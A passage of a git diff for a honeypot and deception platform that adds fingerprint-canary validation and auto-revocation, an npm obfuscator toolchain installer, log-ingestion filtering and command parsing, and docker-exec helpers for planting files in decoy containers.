parsed_fp = None
|
||||||
|
|
||||||
|
# Layer C — mint UUID consistency
|
||||||
|
if parsed_fp is not None:
|
||||||
|
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
|
||||||
|
if parsed_fp.get("mint") != expected_mint:
|
||||||
|
final_headers["_fp_invalid_mint"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer D — rate limit
|
||||||
|
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
|
||||||
|
final_headers["_fp_rate_limited"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
if parsed_fp is not None:
|
||||||
|
final_headers["_fp"] = parsed_fp
|
||||||
|
|
||||||
trigger_id = await repo.record_canary_trigger({
|
trigger_id = await repo.record_canary_trigger({
|
||||||
"token_uuid": token["uuid"],
|
"token_uuid": token["uuid"],
|
||||||
"occurred_at": datetime.now(timezone.utc),
|
"occurred_at": datetime.now(timezone.utc),
|
||||||
@@ -171,7 +321,7 @@ async def _record_hit(
|
|||||||
"user_agent": user_agent,
|
"user_agent": user_agent,
|
||||||
"request_path": request_path,
|
"request_path": request_path,
|
||||||
"dns_qname": dns_qname,
|
"dns_qname": dns_qname,
|
||||||
"raw_headers": raw_headers or {},
|
"raw_headers": final_headers,
|
||||||
})
|
})
|
||||||
try:
|
try:
|
||||||
await bus.publish(
|
await bus.publish(
|
||||||
@@ -189,6 +339,22 @@ async def _record_hit(
|
|||||||
except Exception as e: # noqa: BLE001 — best effort
|
except Exception as e: # noqa: BLE001 — best effort
|
||||||
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
||||||
|
|
||||||
|
# Auto-deregister fingerprint canaries after the first valid fingerprint
|
||||||
|
# is collected. Slug goes dark; the stealth posture means the attacker
|
||||||
|
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
|
||||||
|
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
|
||||||
|
# http/dns canaries are NOT auto-revoked.
|
||||||
|
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
|
||||||
|
try:
|
||||||
|
await repo.update_canary_token_state(token["uuid"], "revoked")
|
||||||
|
await bus.publish(
|
||||||
|
topics.canary(token["uuid"], topics.CANARY_REVOKED),
|
||||||
|
{"token_id": token["uuid"], "trigger_id": trigger_id,
|
||||||
|
"reason": "fingerprint_collected"},
|
||||||
|
)
|
||||||
|
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
|
||||||
|
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
|
||||||
|
|
||||||
|
|
||||||
# ---------------------------- DNS surface --------------------------------
|
# ---------------------------- DNS surface --------------------------------
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,13 @@
|
|||||||
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
||||||
|
|
||||||
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
|
Two entry points share this module:
|
||||||
``@app.command(name="canary")`` Typer entry point that delegates to
|
|
||||||
:func:`decnet.canary.worker.run`.
|
* ``decnet canary`` — runs the worker process. Mirrors the shape of
|
||||||
|
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
|
||||||
|
systemd unit so its argv must stay stable.
|
||||||
|
* ``decnet canary-install-toolchain`` — provisions the Node side of
|
||||||
|
the fingerprint-canary obfuscator. Idempotent; safe to call from
|
||||||
|
the API service unit's ``ExecStartPre``.
|
||||||
|
|
||||||
Not master-only — any host that hosts deckies can run its own
|
Not master-only — any host that hosts deckies can run its own
|
||||||
canary worker (the bus events stay local; the webhook worker on
|
canary worker (the bus events stay local; the webhook worker on
|
||||||
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import shutil
|
||||||
|
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
import typer
|
import typer
|
||||||
|
|
||||||
from . import utils as _utils
|
from . import utils as _utils
|
||||||
from .utils import console, log
|
from .utils import console, log
|
||||||
|
|
||||||
|
_TOOLCHAIN_TIMEOUT_S = 180
|
||||||
|
|
||||||
|
|
||||||
def register(app: typer.Typer) -> None:
|
def register(app: typer.Typer) -> None:
|
||||||
@app.command(name="canary")
|
@app.command(name="canary")
|
||||||
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
|
|||||||
asyncio.run(run())
|
asyncio.run(run())
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
console.print("\n[yellow]Canary worker stopped.[/]")
|
console.print("\n[yellow]Canary worker stopped.[/]")
|
||||||
|
|
||||||
|
@app.command(name="canary-install-toolchain")
def canary_install_toolchain(
    npm_bin: str = typer.Option(
        "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
    ),
) -> None:
    """Install the Node-side toolchain used by fingerprint canaries.

    Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
    directory so the obfuscator's helper script can ``require()``
    ``javascript-obfuscator`` at mint time. Requires Node >= 18.

    Idempotent: re-running on an already-installed tree is fast
    (npm short-circuits when ``node_modules/`` is up-to-date).
    """
    # NOTE: the docstring above is kept verbatim — it may be surfaced as
    # the command's CLI help text, so it is treated as runtime output.
    import decnet.canary as _canary_pkg

    # npm runs in the directory that holds the installed canary package.
    pkg_root = Path(_canary_pkg.__file__).resolve().parent

    # Exit code 2: preconditions not met (manifest or npm missing).
    manifest = pkg_root / "package.json"
    if not manifest.is_file():
        console.print(
            f"[red]canary package.json not found under {pkg_root}; "
            "wheel may be missing the JS toolchain payload.[/]"
        )
        raise typer.Exit(code=2)

    if shutil.which(npm_bin) is None:
        console.print(
            f"[red]npm executable {npm_bin!r} not found on PATH. "
            "Install Node >= 18 and re-run.[/]"
        )
        raise typer.Exit(code=2)

    console.print(
        f"[cyan]installing canary toolchain[/] in {pkg_root}",
    )
    npm_argv = [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"]
    try:
        result = subprocess.run(  # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
            npm_argv,
            cwd=str(pkg_root),
            capture_output=True,
            text=True,
            timeout=_TOOLCHAIN_TIMEOUT_S,
            check=False,
        )
    except subprocess.TimeoutExpired:
        # Exit code 3: npm did not finish within _TOOLCHAIN_TIMEOUT_S.
        console.print("[red]npm install timed out after 3 minutes[/]")
        raise typer.Exit(code=3) from None

    if result.returncode == 0:
        console.print("[green]canary toolchain ready[/]")
        return

    # Failure: surface npm's stderr and propagate its exit status.
    console.print(
        f"[red]npm install failed rc={result.returncode}[/]\n"
        f"{result.stderr.strip()}"
    )
    raise typer.Exit(code=result.returncode)
|
||||||
|
|||||||
@@ -74,6 +74,7 @@ _CONFIG_PLACEHOLDER = """\
|
|||||||
# master-host = 10.0.0.1
|
# master-host = 10.0.0.1
|
||||||
# syslog-port = 6514
|
# syslog-port = 6514
|
||||||
# swarmctl-port = 8770
|
# swarmctl-port = 8770
|
||||||
|
# swarmctl-host = 127.0.0.1
|
||||||
|
|
||||||
# [logging]
|
# [logging]
|
||||||
# system-log = /var/log/decnet/decnet.system.log
|
# system-log = /var/log/decnet/decnet.system.log
|
||||||
|
|||||||
@@ -16,8 +16,16 @@ from .utils import console, log
|
|||||||
def register(app: typer.Typer) -> None:
|
def register(app: typer.Typer) -> None:
|
||||||
@app.command()
|
@app.command()
|
||||||
def swarmctl(
|
def swarmctl(
|
||||||
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
|
port: int = typer.Option(
|
||||||
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
|
8770, "--port",
|
||||||
|
envvar="DECNET_SWARMCTL_PORT",
|
||||||
|
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
|
||||||
|
),
|
||||||
|
host: str = typer.Option(
|
||||||
|
"127.0.0.1", "--host",
|
||||||
|
envvar="DECNET_SWARMCTL_HOST",
|
||||||
|
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
|
||||||
|
),
|
||||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||||
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
||||||
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
||||||
|
|||||||
@@ -233,8 +233,8 @@ def _delete(
|
|||||||
topo = await repo.get_topology(topology_id)
|
topo = await repo.get_topology(topology_id)
|
||||||
if topo is None:
|
if topo is None:
|
||||||
return False, "not-found"
|
return False, "not-found"
|
||||||
if topo["status"] in _RUNNING:
|
if topo.status in _RUNNING:
|
||||||
return False, str(topo["status"])
|
return False, str(topo.status)
|
||||||
ok = await repo.delete_topology_cascade(topology_id)
|
ok = await repo.delete_topology_cascade(topology_id)
|
||||||
return ok, None
|
return ok, None
|
||||||
|
|
||||||
|
|||||||
@@ -342,7 +342,7 @@ def combined_campaign_weight(
|
|||||||
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
||||||
|
|
||||||
|
|
||||||
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
|
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
|
||||||
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
||||||
|
|
||||||
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
||||||
|
|||||||
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
|
|||||||
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
||||||
|
|
||||||
|
|
||||||
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
|
def from_synthetic(att) -> Observation:
|
||||||
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
||||||
|
|
||||||
Lives here so test code doesn't import the factory shape into the
|
Lives here so test code doesn't import the factory shape into the
|
||||||
|
|||||||
@@ -75,6 +75,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
|
|||||||
)
|
)
|
||||||
_RL_MAX_ENTRIES: int = 10_000
|
_RL_MAX_ENTRIES: int = 10_000
|
||||||
|
|
||||||
|
# APP-NAMEs we never want to see in the ingestion stream — native unix
|
||||||
|
# daemons that share a container with a DECNET service. Their logs are
|
||||||
|
# noise: sshd's "Failed password for root from X" duplicates the
|
||||||
|
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
|
||||||
|
# again, and CRON/systemd/etc. say nothing about attacker behavior.
|
||||||
|
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
|
||||||
|
_DROP_APPS: frozenset[str] = frozenset(
|
||||||
|
a.strip()
|
||||||
|
for a in os.environ.get(
|
||||||
|
"DECNET_COLLECTOR_DROP_APPS",
|
||||||
|
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
|
||||||
|
).split(",")
|
||||||
|
if a.strip()
|
||||||
|
)
|
||||||
|
|
||||||
_rl_lock: threading.Lock = threading.Lock()
|
_rl_lock: threading.Lock = threading.Lock()
|
||||||
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
||||||
|
|
||||||
@@ -82,10 +97,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
|
|||||||
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
||||||
"""
|
"""
|
||||||
Return True if this parsed event should be written to the JSON ingestion
|
Return True if this parsed event should be written to the JSON ingestion
|
||||||
stream. Rate-limited connection-lifecycle events return False when another
|
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
|
||||||
event with the same (attacker_ip, decky, service, event_type) was emitted
|
rate-limits connection-lifecycle events within a dedup window.
|
||||||
inside the dedup window.
|
|
||||||
"""
|
"""
|
||||||
|
if parsed.get("service", "") in _DROP_APPS:
|
||||||
|
return False
|
||||||
event_type = parsed.get("event_type", "")
|
event_type = parsed.get("event_type", "")
|
||||||
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
||||||
return True
|
return True
|
||||||
@@ -220,6 +236,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
|||||||
except ValueError:
|
except ValueError:
|
||||||
ts_formatted = ts_raw
|
ts_formatted = ts_raw
|
||||||
|
|
||||||
|
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
|
||||||
|
# "CMD ") get event_type rewritten to "command". `fields` stays empty
|
||||||
|
# so the frontend's msg-based pill rendering doesn't double up.
|
||||||
|
if event_type == "-" and msg.startswith("CMD "):
|
||||||
|
event_type = "command"
|
||||||
|
|
||||||
return {
|
return {
|
||||||
"timestamp": ts_formatted,
|
"timestamp": ts_formatted,
|
||||||
"decky": decky,
|
"decky": decky,
|
||||||
|
|||||||
@@ -39,6 +39,7 @@ Shape::
|
|||||||
master-host = 10.0.0.1 # required on agents
|
master-host = 10.0.0.1 # required on agents
|
||||||
syslog-port = 6514
|
syslog-port = 6514
|
||||||
swarmctl-port = 8770
|
swarmctl-port = 8770
|
||||||
|
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
|
||||||
|
|
||||||
[logging]
|
[logging]
|
||||||
system-log = /var/log/decnet/decnet.system.log
|
system-log = /var/log/decnet/decnet.system.log
|
||||||
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
|
|||||||
"master-host": "DECNET_SWARM_MASTER_HOST",
|
"master-host": "DECNET_SWARM_MASTER_HOST",
|
||||||
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
||||||
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
||||||
|
"swarmctl-host": "DECNET_SWARMCTL_HOST",
|
||||||
},
|
},
|
||||||
"logging": {
|
"logging": {
|
||||||
"system-log": "DECNET_SYSTEM_LOGS",
|
"system-log": "DECNET_SYSTEM_LOGS",
|
||||||
|
|||||||
@@ -137,6 +137,19 @@ def parse_line(line: str) -> LogEvent | None:
|
|||||||
msg = tail.group(1).strip() if tail else ""
|
msg = tail.group(1).strip() if tail else ""
|
||||||
attacker_ip = _extract_attacker_ip(fields, msg)
|
attacker_ip = _extract_attacker_ip(fields, msg)
|
||||||
|
|
||||||
|
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
|
||||||
|
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
|
||||||
|
# Without this rewrite they're invisible to the behavioral profiler, which
|
||||||
|
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
|
||||||
|
# invocation uses --msgid command, so we must also handle the non-nil case.
|
||||||
|
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
|
||||||
|
event_type = "command"
|
||||||
|
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||||
|
for k, v in re.findall(r'(\w+)=(\S+)', head):
|
||||||
|
fields.setdefault(k, v)
|
||||||
|
if sep:
|
||||||
|
fields.setdefault("command", cmd_rest)
|
||||||
|
|
||||||
# Mutator-emitted transitions arrive on the same ingest stream but
|
# Mutator-emitted transitions arrive on the same ingest stream but
|
||||||
# belong in the substrate-state index, not the per-IP attacker one.
|
# belong in the substrate-state index, not the per-IP attacker one.
|
||||||
kind: EventKind = (
|
kind: EventKind = (
|
||||||
|
|||||||
@@ -70,7 +70,7 @@ async def run_reuse_loop(
|
|||||||
wake_tasks.append(asyncio.create_task(
|
wake_tasks.append(asyncio.create_task(
|
||||||
_run_control_listener_signal(bus, "reuse-correlator"),
|
_run_control_listener_signal(bus, "reuse-correlator"),
|
||||||
))
|
))
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc:
|
||||||
log.warning(
|
log.warning(
|
||||||
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
||||||
exc,
|
exc,
|
||||||
@@ -86,7 +86,7 @@ async def run_reuse_loop(
|
|||||||
results = await engine.correlate_credential_reuse(
|
results = await engine.correlate_credential_reuse(
|
||||||
repo, min_targets=min_targets,
|
repo, min_targets=min_targets,
|
||||||
)
|
)
|
||||||
except Exception: # noqa: BLE001
|
except Exception:
|
||||||
log.exception("reuse correlator: tick failed")
|
log.exception("reuse correlator: tick failed")
|
||||||
results = []
|
results = []
|
||||||
|
|
||||||
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
|
|||||||
wake.set()
|
wake.set()
|
||||||
except asyncio.CancelledError:
|
except asyncio.CancelledError:
|
||||||
raise
|
raise
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc:
|
||||||
log.warning(
|
log.warning(
|
||||||
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
||||||
pattern, exc,
|
pattern, exc,
|
||||||
|
|||||||
39
decnet/decky_io/__init__.py
Normal file
39
decnet/decky_io/__init__.py
Normal file
@@ -0,0 +1,39 @@
|
|||||||
|
"""Shared primitives for writing/deleting files inside running deckies.
|
||||||
|
|
||||||
|
The canary planter and the orchestrator SSH driver both need to drop
|
||||||
|
bytes into a decky container's filesystem, then sometimes unlink them.
|
||||||
|
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
|
||||||
|
before this module existed.
|
||||||
|
|
||||||
|
Public API:
|
||||||
|
|
||||||
|
* :func:`write_file_to_container` — write bytes at a path, set mode,
|
||||||
|
optionally backdate mtime.
|
||||||
|
* :func:`delete_file_from_container` — best-effort ``rm -f``.
|
||||||
|
* :func:`resolve_topology_container` — pick the right docker container
|
||||||
|
for a MazeNET decky based on its services list.
|
||||||
|
* :func:`resolve_decky_container` — async helper that takes
|
||||||
|
``(decky_name, topology_id?)``, hydrates the topology when needed,
|
||||||
|
and returns the docker container name.
|
||||||
|
|
||||||
|
Container resolution conventions are documented in
|
||||||
|
:mod:`decnet.topology.compose`; we mirror them here without taking
|
||||||
|
a runtime dependency on the compose generator.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from .resolve import (
|
||||||
|
resolve_decky_container,
|
||||||
|
resolve_topology_container,
|
||||||
|
)
|
||||||
|
from .write import (
|
||||||
|
delete_file_from_container,
|
||||||
|
write_file_to_container,
|
||||||
|
)
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"delete_file_from_container",
|
||||||
|
"resolve_decky_container",
|
||||||
|
"resolve_topology_container",
|
||||||
|
"write_file_to_container",
|
||||||
|
]
|
||||||
72
decnet/decky_io/resolve.py
Normal file
72
decnet/decky_io/resolve.py
Normal file
@@ -0,0 +1,72 @@
|
|||||||
|
"""Decky-name → docker container name resolution.
|
||||||
|
|
||||||
|
Two scopes:
|
||||||
|
|
||||||
|
* **Fleet**: every fleet decky has a ``ssh`` service container named
|
||||||
|
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
|
||||||
|
target it because it carries the most realistic filesystem layout.
|
||||||
|
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
|
||||||
|
decky exposes the ssh service; otherwise the decky's base container
|
||||||
|
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
|
||||||
|
:func:`decnet.topology.compose._container_name`).
|
||||||
|
|
||||||
|
Keeping resolution centralised here means new ``docker exec`` callers
|
||||||
|
(file drops, future bulk planters, etc.) never need to learn the
|
||||||
|
naming conventions — they just call :func:`resolve_decky_container`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Any, Iterable, Optional
|
||||||
|
|
||||||
|
_SSH_CONTAINER_SUFFIX = "-ssh"


def resolve_topology_container(
    topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
    """Return the docker container name to target for a MazeNET decky.

    A decky that exposes the ``ssh`` service is addressed through its
    ``<decky_name>-ssh`` service container; any other decky is addressed
    through its base container, ``decnet_t_<first 8 chars of topology_id>_<decky_name>``.

    Pure string computation: nothing is looked up and no I/O happens.
    *services* is consumed exactly once, so a one-shot iterator is fine.
    """
    exposes_ssh = "ssh" in frozenset(services)
    if not exposes_ssh:
        return f"decnet_t_{topology_id[:8]}_{decky_name}"
    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
|
||||||
|
|
||||||
|
async def resolve_decky_container(
    repo: Any,
    decky_name: str,
    *,
    topology_id: Optional[str] = None,
) -> str:
    """Map *decky_name* to the docker container that should be exec'd into.

    Without a ``topology_id`` (fleet scope) the answer is always
    ``<decky_name>-ssh`` and *repo* is never touched; existence of the
    decky is not checked here.

    With a ``topology_id`` the topology is hydrated through *repo*, the
    decky is located by name (``decky_config["name"]`` first, then the
    row's own ``name``), and its ``services`` list is handed to
    :func:`resolve_topology_container`.

    Raises:
        LookupError: the topology could not be hydrated, or it contains
            no decky called *decky_name*.
    """
    if topology_id is None:
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"

    # Deferred import: only the topology path needs the persistence layer.
    from decnet.topology.persistence import hydrate

    topology = await hydrate(repo, topology_id)
    if topology is None:
        raise LookupError(f"topology {topology_id!r} not found")

    def _name_of(entry):
        config = entry.get("decky_config") or {}
        return config.get("name") or entry.get("name")

    # First decky whose resolved name matches wins.
    match = next(
        (entry for entry in topology["deckies"] if _name_of(entry) == decky_name),
        None,
    )
    if match is None:
        raise LookupError(
            f"decky {decky_name!r} is not in topology {topology_id!r}"
        )
    return resolve_topology_container(
        topology_id, decky_name, match.get("services") or [],
    )
|
||||||
124
decnet/decky_io/write.py
Normal file
124
decnet/decky_io/write.py
Normal file
@@ -0,0 +1,124 @@
|
|||||||
|
"""``docker exec``-driven file write/delete inside a decky container.
|
||||||
|
|
||||||
|
The write path streams a base64-encoded payload over stdin to
|
||||||
|
``base64 -d`` inside the container, so binary content of any size up
|
||||||
|
to docker's stream limits is safe — interpolating bytes into argv
|
||||||
|
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import base64
|
||||||
|
import shlex
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
|
||||||
|
log = get_logger("decky_io.write")
|
||||||
|
|
||||||
|
_DOCKER = "docker"
|
||||||
|
_DEFAULT_TIMEOUT = 8.0
|
||||||
|
|
||||||
|
|
||||||
|
def _dirname(path: str) -> str:
|
||||||
|
idx = path.rfind("/")
|
||||||
|
if idx <= 0:
|
||||||
|
return "/"
|
||||||
|
return path[:idx]
|
||||||
|
|
||||||
|
|
||||||
|
async def _run(
    argv: list[str],
    *,
    stdin_bytes: Optional[bytes] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
    """Run *argv* as a child process and collect its output.

    Args:
        argv: Program and arguments, executed without a shell.
        stdin_bytes: Bytes to feed to the child's stdin. When ``None`` no
            stdin pipe is created.
        timeout: Seconds to wait for the child to finish.

    Returns:
        ``(returncode, stdout, stderr)`` with both streams decoded as UTF-8
        (undecodable bytes replaced). Two synthetic results are produced
        without a real exit status:

        * ``(127, "", "argv[0] not found: ...")`` when the executable does
          not exist;
        * ``(124, "", "timeout")`` when the child outlives *timeout*; the
          child is killed and reaped before returning.
    """
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=timeout,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            # Child exited between the timeout firing and the kill.
            pass
        # Reap the child. Without this the killed process lingers as a
        # zombie and its transport stays open until the loop shuts down.
        await proc.wait()
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def write_file_to_container(
    container: str,
    path: str,
    content: bytes,
    *,
    mode: int = 0o644,
    mtime: Optional[datetime] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Drop *content* at *path* inside *container* using ``docker exec``.

    The payload is base64-encoded and piped over stdin to ``base64 -d``
    in the container, so it never appears in argv. The shell pipeline,
    chained with ``&&``, is:

    1. ``mkdir -p`` the parent directory of *path*;
    2. decode stdin into *path*;
    3. ``chmod`` *path* to *mode* (rendered in octal);
    4. only when *mtime* is given, ``touch -d`` *path* with the timestamp
       converted to UTC and formatted as ``YYYY-MM-DD HH:MM:SS UTC``.

    Returns:
        ``(True, None)`` on exit status 0. Otherwise ``(False, error)``
        where ``error`` is the stripped stderr capped at 256 characters,
        or ``"rc=<n>"`` if stderr was empty. An empty *path* short-circuits
        to ``(False, "empty path")`` without running anything.
    """
    if not path:
        return False, "empty path"

    payload = base64.b64encode(content)
    target = shlex.quote(path)
    steps = [
        f"mkdir -p {shlex.quote(_dirname(path))}",
        f"base64 -d > {target}",
        f"chmod {mode:o} {target}",
    ]
    if mtime is not None:
        stamp = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        steps.append(f"touch -d {shlex.quote(stamp)} {target}")

    # ``-i`` keeps stdin attached so the encoded payload reaches base64.
    rc, _out, stderr = await _run(
        [_DOCKER, "exec", "-i", container, "sh", "-c", " && ".join(steps)],
        stdin_bytes=payload,
        timeout=timeout,
    )
    if rc != 0:
        err = stderr.strip()[:256] or f"rc={rc}"
        log.warning(
            "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
            container, path, rc, stderr[:120],
        )
        return False, err
    return True, None
|
||||||
|
|
||||||
|
|
||||||
|
async def delete_file_from_container(
    container: str,
    path: str,
    *,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Remove *path* inside *container* with ``rm -f``, best effort.

    Returns:
        ``(True, None)`` when the command exits 0. Because ``rm -f`` also
        exits 0 for a file that is already gone, success means "the file
        is absent now", not "this call removed it". On any other exit
        status the result is ``(False, error)`` with the stripped stderr
        (capped at 256 characters) or ``"rc=<n>"`` when stderr is empty.
    """
    quoted = shlex.quote(path)
    rc, _out, stderr = await _run(
        [_DOCKER, "exec", container, "sh", "-c", f"rm -f {quoted}"],
        timeout=timeout,
    )
    if rc != 0:
        return False, stderr.strip()[:256] or f"rc={rc}"
    return True, None
|
||||||
@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
|
import json
|
||||||
import shutil
|
import shutil
|
||||||
import subprocess # nosec B404
|
import subprocess # nosec B404
|
||||||
import time
|
import time
|
||||||
@@ -163,6 +164,48 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
|
|||||||
shutil.copy2(src, dest)
|
shutil.copy2(src, dest)
|
||||||
|
|
||||||
|
|
||||||
|
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
|
||||||
|
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
|
||||||
|
|
||||||
|
Used for post-deploy verification: ``compose up -d`` returns 0 the
|
||||||
|
moment containers are *started*, but a service that crashes on boot
|
||||||
|
(port collision, bad image, missing dependency) only shows up here.
|
||||||
|
Returns an empty list when compose has nothing to report (and on
|
||||||
|
parse failure — caller treats that as 'unverifiable, don't gate').
|
||||||
|
"""
|
||||||
|
cmd = [
|
||||||
|
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
|
||||||
|
"ps", "--all", "--format", "json",
|
||||||
|
]
|
||||||
|
try:
|
||||||
|
result = subprocess.run( # nosec B603
|
||||||
|
cmd, capture_output=True, text=True, check=False,
|
||||||
|
)
|
||||||
|
except FileNotFoundError:
|
||||||
|
return []
|
||||||
|
if result.returncode != 0:
|
||||||
|
return []
|
||||||
|
rows: list[dict[str, object]] = []
|
||||||
|
# ``docker compose ps --format json`` emits one JSON object per line
|
||||||
|
# (newline-delimited), not a JSON array. Parse line-by-line so a
|
||||||
|
# single bad line doesn't poison the whole result.
|
||||||
|
for line in (result.stdout or "").splitlines():
|
